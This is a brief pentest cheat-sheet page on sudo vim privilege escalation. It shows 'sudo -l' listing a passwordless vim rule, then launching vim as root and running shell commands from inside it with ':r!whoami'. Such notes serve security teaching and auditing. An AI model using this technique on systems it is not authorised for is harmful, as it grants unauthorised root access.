Sudo Vim Privilege Escalation

Sudo vim command might be vulnerable to privilege escalation (PrivEsc).

Investigation

sudo -l

(ALL) NOPASSWD: vim example.txt

If we can execute "vim" command as root, we can execute the shell command in the vim editor.

Exploitation

Simply run "vim" command as root.

sudo vim example.txt

In Vim editor, we can run shell commands as root.

:r!whoami
PreviousSudo Umount Privilege EscalationNextSudo Wall Privilege Escalation

Last updated